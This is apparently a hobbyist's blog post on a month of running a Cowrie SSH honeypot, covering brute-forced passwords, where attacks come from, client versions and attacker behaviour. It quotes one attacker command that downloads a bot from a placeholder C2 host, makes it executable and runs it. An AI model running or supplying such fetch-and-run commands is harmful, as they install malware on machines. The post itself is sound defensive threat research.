Adventures in Running a Honeypot
Posted 2024/08/18
I’ve been doing some malware research as a hobby for a while now because I find it interesting and useful for sharpening my reverse engineering skills. Malware researchers analyze malware samples to determine their unique features, objectives, and potential effects. I usually work on random infostealers that pop up on Discord or old malicious Microsoft Office documents (not all of which I have written about)1. Looking to get deeper into malware research, I decided to start a honeypot server to do a bit more threat hunting and collect newer malware samples to analyze.
What is a Honeypot
A honeypot is a piece of data or device that appears to legitimately have information or resources of value to a potential online attacker. The honeypot is actually isolated and monitored, and will log and analyze the activities of any attacker. Honeypot servers host services that appear to be vulnerable to bait in attacks, which can be analyzed to better understand its source and behaviour.
How did I setup my Honeypot
My honeypot server is an Ubuntu server VM running in an isolated cloud account. The server has its own public IPv4 address and runs the Cowrie SSH/Telnet honeypot software on the usual SSH TCP/22 port. Cowrie is intentionally setup to accept a variety of common username and passwords and upon a successful login will emulate a Debian 5.0 shell with a fake file system. Attackers can send commands to the shell, upload files with SFTP or SCP, or attempt SSH proxying. Any actions made or credentials used will be logged. Cowrie will also save any malicious files uploaded to it or downloaded through attempted Wget or Curl commands for further analysis. My Cowrie installation is also setup to send its logs to Datadog to make activity on the honeypot searchable, and to take advantage of Datadog’s threat intelligence capabilities.
To make Cowrie more convincing as an SSH server, the actual SSH server that I use to manage the server is run on a different port and hidden behind port knocking. Port knocking blocks access to the SSH server’s port using the firewall, unless a specific sequence of connection attempts are made first. This stops the SSH server from showing up in port scans of the server, making Cowrie’s role as the server’s legitimate SSH server more convincing.
Random things that I learned from setting this all up:
- Some Ubuntu 24.04 images available on cloud providers won’t respect the port you select in
/etc/ssh/sshd_config
anymore ðŸ˜, instead you have to edit the Systemdssh.socket
configuration - Remember to actually enable the knockd and SSH services to run on boot before you reboot the server 🤣 (I think SSH somehow got disabled during all my attempts at changing the port)
- Some cloud providers provide serial access to your machines to let you login using a TTY session in case you mess up your SSH!
- You can’t use serial access unless you set a password for your user account which I usually don’t do because I use SSH keys ðŸ˜
- Some cloud providers don’t like you using UFW for your firewall and instead want you to use IPTables manually?
With this setup and knowledge that attackers are constantly port scanning or spraying the entire IPv4 address space with attacks2, all I had to do was wait for attackers to run brute force password attacks and analyze the following activity. I also plan on adding the TANNER/SNARE web application honeypot created by the MushMush Foundation in the near future to collect information on web application attacks as well.
What have I found so far
I’ve been running the honeypot server for about a month and have collected ~150 malware samples so far! Attackers really are hard at work with cloud server instances or botnets dedicated to port scanning the internet and password spraying attacks.
Below is a histogram of activity on the Cowrie service, note the spikes in activity that occur whenever big password bruteforce attacks are conducted.
Usernames & Passwords
Unsurprisingly, some of the most used passwords in bruteforce attacks were variations of 123456
, root
, admin
and password
. Some passwords that surprised me in how frequently they were attempted were keywords related to cryptocurrencies3, some common first names, or weird keyboard layout tricks like 1q2w3e4r
(first two rows of QWERTY) or !QAZ@WSX
(first two columns).
I tried to categorize the passwords used and got the following rough count:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 |
|
I also found that not all passwords tested come from password dictionaries, but bots will occasionally tailor passwords to the target through methods like incorporating the target IP or service name into the password.
Geographic Origin
Analyzing the countries that attacks came from was pretty interesting. The United States, China, South Korea, and India showing up at the top makes sense considering their respective Internet of Things markets are the largest in the world, and IoT devices are some of the largest contributors to botnets like Mirai. Many botnets use these devices to conduct DDoS attacks and password bruteforce attacks. After these IoT market heavyweights, I expected the graph of top countries to roughly follow the size of each country’s IPv4 address allocation, but that does not seem to be the case.
Analyzing IPs by ASNs shows that not all attacks come from IoT devices. Many attacks do originate from consumer telecommunication networks which is representative of IoT attacks like ASN4134 CHINANET-BACKBONE, ASN14061 Korea Telecom, and ASN7922 Comcast. However, many attacks seem to come from cloud providers like ASN396982 Google Cloud Platform, ASN14061 Digital Ocean, ASN8075 Microsoft, and ASN37963 Alibaba which suggests that insecurely configured servers are being added to botnets or attackers are setting up port scanners, bruteforcers, and command & control infrastructure on these providers.
SSH Client Versions
Clients that connect to SSH servers usually pass along information about their client version and supported encryption and hashing algorithms. Looking at SSH client versions, we can see that common client libraries used to create bruteforcers include the builtin Golang SSH module, Paramiko for Python, Makiko for Rust, and LibSSH. Many attackers also use regular clients like PUTTY or OpenSSH. It is interesting to see that OpenSSH will also provide information about the client’s Debian, Ubuntu, or Raspbian versions. Port scanners like Nmap, ZGrab2.0, and MGLNDD can also be seen.
Commands & Payloads
Finally moving onto what we setup the whole honeypot for, the attacks themselves!
A lot of the bruteforcers that attack the honeypot upon having a successful login seem to just collect information about the system, and presumably let the attacker come back and investigate the server later. Common commands run for information gathering include the following:
1 2 3 4 5 6 7 8 9 |
|
Most other attacker commands involved downloading executables with Wget or Curl, running those executables, moving or deleting files, changing passwords, changing file permissions, or gaining persistence with Cron.
It was interesting to see that when downloading malicious files, attackers would try using Wget, Curl, and BusyBox Wget just in case the victim didn’t have them all installed. Some attackers would try installing Curl themselves before this step using the APT package manager. Some attackers also went the extra step of opening TCP sockets themselves to make HTTP requests if none of those utilities were available:
1 |
|
It was also interesting to see there were some rivalries among malware authors. Attackers would frequently try to kill other processes they suspected were other malware or harden firewall rules to block rival command & control servers (C2):
1 2 3 4 |
|
The attempt to block rival C2 servers actually led me to find C2 servers that haven’t attacked my honeypot yet with HTTP or FTP servers filled with additional samples I could download from.
Below is a graph of the most commonly run commands that attackers use:
The majority of malicious programs were delivered to my honeypot through the execution of Wget or Curl commands to download from an HTTP server. These commands would be chained with commands to enable execution permissions and then the execution of the malicious program like curl -s -O http://<C2_SERVER_IP>/bot && chmod 777 bot && ./bot
. Sometimes these commands would download the malicious ELF or PE executable directly or download a dropper script. These dropper scripts would contain URLs for executables compiled for many different CPU architectures, and the script would try downloading and run them all:
1 2 3 4 5 6 7 |
|
Some malicious programs were also uploaded to the honeypot using SFTP or SCP and use followup commands to run the executable.
The malicious files I have collected so far have been in many different file formats and compiled for many different CPU architectures:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 |
|
There are so many samples to sift through, but with this new material to analyze, expect to see a resumption of blog posts on Malware reverse engineering in the future!
All Indicators of Compromise (malicious file hashes, URLs, domain names, and IP addresses) that I’m collecting from this honeypot project can be found in this VirusTotal collection.
-
I did intercept a Log4J exploit payload that was thrown at my website once containing the January 2024 version of the RedTail cryptominer malware once ↩
-
It only actually takes like 5 minutes to scan the entire IPv4 address space using tools like masscan ↩
-
Cryptocurrency is an abject disaster - Drew DeVault’s blog ↩